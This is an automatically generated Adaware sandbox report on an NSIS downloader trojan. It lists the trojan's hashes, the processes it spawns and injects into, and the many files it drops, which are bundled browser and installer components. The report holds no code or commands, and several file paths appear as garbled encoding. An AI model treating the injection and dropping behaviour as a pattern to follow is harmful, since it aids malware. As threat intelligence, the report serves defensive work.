Trojan.Downloader.NSIS.FI_cec0f79b5c – Adaware

not-a-virus:AdWare.NSIS.ExecCmd.aa (Kaspersky), Trojan.Downloader.NSIS.FI (AdAware), Trojan-Banker.Win32.Brasil.FD, Trojan-Downloader.Win32.Karagany.1.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Alureon.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.IEDummy.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, TrojanDropperVtimrun.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan-Downloader, Banker, Trojan, VirTool, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: cec0f79b5c1201540929259232f9cfb6

SHA1: f91604070ec3ca9017bcd283abb1c44dcf32c58f

SHA256: e4bee2be969275e1a17c353f57f18ed979582a0aaae17b56aee9ef8fa3418a58

SSDeep: 3072:vLk395hYXJhVrjVtILlvRAjA3I/gqBeLAQRdeRpZQI2mIJ89 hNiaI9LqBnoqCcy:vQqjztILZRA03I/eldaPvAYKIwBhCcmX

Size: 188750 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: FST

Created at: 2009-06-07 00:41:48

Analyzed on: WindowsXPESX SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

fm4.exe:1820
netbian_a_41763.exe:1100
vcredist_x86.exe:3808
FHSev.exe:1744
FHSev.exe:628
FHSev.exe:204
setup_3386.exe:1808
BDKVWsc.exe:3212
RegSvr32.exe:3252
RegSvr32.exe:3248
bddownloader.exe:3224
QQBrowser.exe:1848
QQBrowser.exe:2600
QQBrowser.exe:2916
QQBrowser.exe:3364
QQBrowser.exe:3860
QQBrowser.exe:2968
QQBrowser.exe:2496
QQBrowser.exe:3184
QQBrowser.exe:3160
QQBrowser.exe:3164
QQBrowser.exe:2076
QQBrowser.exe:3300
rundll32.exe:228
fm4svr.exe:2192
F0916_s_30911.exe:1112
QQBrowser_Setup:2052
BDDownloader.exe:2920
mscorsvw.exe:1912
%original file name%.exe:1268
regsvr32.exe:2964
regsvr32.exe:3480
cacls.exe:2376
MYLogger.exe:864
netsh.exe:3436
9377mycs_Y_mgaz2_01.exe:1812
bddownloader.ex:2968
MsiExec.exe:3572

The Trojan injects its code into the following process(es):

G0828_s_70988.exe:1500
FHSev.exe:752
fm4svr.exe:348
%original file name%.exe:1312
MYLogger.exe:504
iexplore.exe:416
services.exe:760
svchost.exe:1080

Mutexes

The following mutexes were created/opened:

SetupInsShimCacheMutex_!MSFTHISTORY!_c:!documents and settings!adm!local settings!temporary internet files!content.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!history!history.ie5!WininetStartupMutexWininetConnectionMutexWininetProxyRegistryMutexRasPbFileZonesCacheCounterMutexZonesCounterMutexZonesLockedCacheCounterMutex

File activity

The process fm4.exe:1820 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\a[1].htm (3 bytes)
%Program Files%\FM4.0_201410162111\201410162111\Data\client.ini (42 bytes)
%Program Files%\FM4.0_201410162111\201410162111\Data\user2.ini (402 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ver[1].txt (36 bytes)
%Program Files%\FM4.0_201410162111\201410162111\Data\server.ini (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stj[1].htm (3 bytes)
%Program Files%\FM4.0_201410162111\201410162111\SysConfig.ini (468 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stj[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\a[1].htm (0 bytes)

The process netbian_a_41763.exe:1100 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\jieya_button.png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\core[1].php (749 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\installedSoftInfo.ini (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_kprd67_55.xml (229 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\input_01.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DI_9A.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_86.tmp_0 (631 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\up.png (2 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@img.wallba[1].txt (247 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\install_begin[1].htm (318 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_8A.tmp (633 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\mennu_narrow.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CA_89.tmp (2521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\InStaller.ini (953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\img_01.png (980 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\jindutiao.png (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\LZMA.dll (68 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\change.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\delete.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\check-box_focus.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\down.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\skinconfig.ini (82 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_88.tmp (225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_87.tmp_0 (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\op_84.tmp_0 (631 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\prompt\go.png (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\prompt\bg.png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\bg_02.png (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\finish.png (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\TongJICNZZ.dll (1333 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\InStaller_prompt.ini (418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\InStaller\check-box.png (3 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (3952 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\ÃƒÆ’Ã¢â‚¬Å¾Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã‹â€ ÃƒÆ’Ã‚Â\ui\prompt\cancel.png (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MA_98.tmp (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\10162111666\skinconfig\installedSoftInfo.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_97.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_96.tmp (0 bytes)
C:\_87.tmp (0 bytes)
C:\op_86.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_8A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_94.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CA_89.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_8F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_93.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_9B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_8D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DI_9A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041720130418 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_88.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_91.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_99.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_95.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_92.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_90.tmp (0 bytes)
C:\op_84.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_8C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_8B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_8E.tmp (0 bytes)
C:\_85.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\MA_98.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DW_9C.tmp (0 bytes)

The process G0828_s_70988.exe:1500 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\HomePage\0\website (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayPlugin.rdb (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp\file\vcredist_x86.exe (82435 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (440 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp\PluginInstallHelper.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyA4.tmp (1874353 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\KVCommonRes.rdb (13908 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp\GetSupplyId.dll (3616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\SearchProtection.rdb (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\BaiduPlayerNetSetup_481[1].exe (456 bytes)
%Documents and Settings%\%current user%\Local Settings (4 bytes)
%Program Files%\Tencent\QQBrowser\Html\images (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{B9C6ADA1-8B36-4c8d-97E5-1F89AE3A5341}\images (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions (4 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014101620141017\index.dat (480 bytes)
%WinDir%\Fonts (864 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsrA1.tmp (10956 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp\BDMSkin.dll (35001 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp\res\InstallWnd.zip (36078 bytes)
%System%\config (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp\InstallHelper.dll (34365 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayDldProtect.rdb (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp\nsA9.tmp (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp\NewPih.dll (4992 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255 (4 bytes)
%WinDir%\Prefetch (192 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default (4 bytes)
%Documents and Settings%\%current user% (4 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (672 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm82.tmp\BaiduPlayerNetSetup_481.exe (456 bytes)
%Program Files%\Baidu\BaiduAn\2.3.0.2225\vcredist_x86.exe (18934 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp\nsExec.dll (15 bytes)
%Program Files%\Tencent\QQBrowser\Html (4 bytes)
%Documents and Settings%\%current user%\Cookies (96 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsxA3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp (0 bytes)
C:\s1es (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp\file\vcredist_x86.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoA5.tmp\nsA9.tmp (0 bytes)
%Program Files%\Baidu\s1es (0 bytes)
%Program Files%\s1es (0 bytes)

The process vcredist_x86.exe:3808 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredis1.cab (6255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\IXP000.TMP\vcredist.msi (42423 bytes)

The process FHSev.exe:752 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\Update2[1].rar (1497 bytes)
%Program Files%\FM4.0_201410162111\201410162111\Data\2112.Tmp (1 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\fwtj[1].htm (3 bytes)

The Trojan deletes the following file(s):

%Program Files%\FM4.0_201410162111\201410162111\Data\2112.Tmp (0 bytes)

The process setup_3386.exe:1808 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\FM4.0_201410162111\201410162111\avcodec-54.dll (23424 bytes)
%Program Files%\FM4.0_201410162111\201410162111\Data\user2.ini (42 bytes)
%Program Files%\FM4.0_201410162111\201410162111\fm4svr.exe (23424 bytes)
%Program Files%\FM4.0_201410162111\201410162111\channels.xml (784 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\FM4.0\FM4.0.lnk (882 bytes)
%Program Files%\FM4.0_201410162111\201410162111\SysConfig.ini (664 bytes)
%Program Files%\FM4.0_201410162111\201410162111\audio.dll (3616 bytes)
%Program Files%\FM4.0_201410162111\201410162111\source.dll (6584 bytes)
%Program Files%\FM4.0_201410162111\201410162111\FHSev.exe (11048 bytes)
%Program Files%\FM4.0_201410162111\201410162111\fm4.exe (63950 bytes)
%Program Files%\FM4.0_201410162111\201410162111\Data\setup.ini (108 bytes)
%Program Files%\FM4.0_201410162111\201410162111\DuiLib.dll (16288 bytes)
%Program Files%\FM4.0_201410162111\201410162111\Data\dh.ini (56 bytes)
%Program Files%\FM4.0_201410162111\201410162111\Unins.exe (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stj[1].htm (3 bytes)
%Program Files%\FM4.0_201410162111\201410162111\Data\client.ini (36 bytes)
%Program Files%\FM4.0_201410162111\201410162111\avformat-54.dll (12088 bytes)
%Program Files%\FM4.0_201410162111\201410162111\Data\version.ini (32 bytes)
%Program Files%\FM4.0_201410162111\201410162111\favorfm.xml (440 bytes)
%Program Files%\FM4.0_201410162111\201410162111\libav.dll (6360 bytes)
%Program Files%\FM4.0_201410162111\201410162111\pthreadGC2.dll (3616 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\FM4.0\ÃƒÆ’Ã¢â‚¬Â¦ÃƒÆ’Ã‚Â¤ÃƒÆ’Ã¢â‚¬â€œÃƒÆ’Ã†â€™Ãƒâ€šÃ‚Â¹Ãƒâ€šÃ‚Â¤Ãƒâ€šÃ‚Â¾ÃƒÆ’Ã…Â¸\ÃƒÆ’Ã‚ÂÃƒâ€šÃ‚Â¶ÃƒÆ’Ã¢â‚¬ÂÃƒÆ’Ã‹Å“FM4.0.lnk (908 bytes)
%Program Files%\FM4.0_201410162111\201410162111\avutil-52.dll (5520 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\FM4.0\Ãƒâ€šÃ‚Â¹ÃƒÆ’Ã¢â€žÂ¢Ãƒâ€šÃ‚Â·Ãƒâ€šÃ‚Â½ÃƒÆ’Ã¢â‚¬â€œÃƒÆ’Ã‚Â·ÃƒÆ’Ã¢â‚¬â„¢Ãƒâ€šÃ‚Â³.lnk (334 bytes)
%Program Files%\FM4.0_201410162111\201410162111\avcore.dll (2392 bytes)
%Program Files%\FM4.0_201410162111\201410162111\swresample-0.dll (3312 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stj[1].htm (0 bytes)

The process QQBrowser.exe:1848 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\ThirdParty.gt (1281 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\010-Jeans.gt (313341 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\015-Metal.gt (291858 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\999-Private.gt (313023 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\006-Her Collar.gt (299853 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\011-Scotland-lattice.gt (314993 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\001-Cool Air.gt (292151 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\005-Ink Blue.gt (303437 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\012-Woodland.gt (313341 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\008-Silent Stone.gt (299943 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\007-Coffee Time.gt (300471 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\DarkStripes.gt (673 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\013-Linen.gt (289447 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\004-Cool Gray.gt (291623 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\003-Silent Green.gt (291623 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\016-Dots.gt (289205 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\014-Neko.gt (292237 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\LightStripes.gt (673 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\009-Jaguar.gt (289970 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Skin\002-My Way.gt (294263 bytes)

The process QQBrowser.exe:2600 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Program Files%\Tencent\QQBrowser\QQBrowserConfig.dat (114 bytes)

The process QQBrowser.exe:3364 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\share.html (3 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\msg.png (146 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\background.html (18 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\share-btn.png (261 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\share.css (7 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\qzonelogin.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\images\play.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\text_share.js (5 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\app.js (3 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\images\qzone.png (633 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\images\close.png (304 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\js\text_share.js (5 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\images\toolbar_btn_Qzone.png (441 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\js\app.js (3 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\share-icon.png (337 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\qzone.png (633 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\toolbar_btn_Qzone.png (441 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\close.png (304 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\image_share.js (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\json2.js (3 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\background.html (18 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\toolbar_btn_Qzone_dark1.png (667 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\images\share-btn.png (261 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\popup.html (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\js\qwest.js (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\images\msg.png (146 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\images\toolbar_btn_new_Qzone.png (552 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\popup.html (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\{F0771800-9DCB-4360-A99A-D5509DA510CD}\2.0.0.11\js\image_share.js (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\manifest.json (980 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1 (4 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\share2.html (3 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\Extensions\Temp\{F0771800-9DCB-4360-A99A-D5509DA510CD}_1\images\toolbar_btn_Qzone_light1.png (435 bytes)
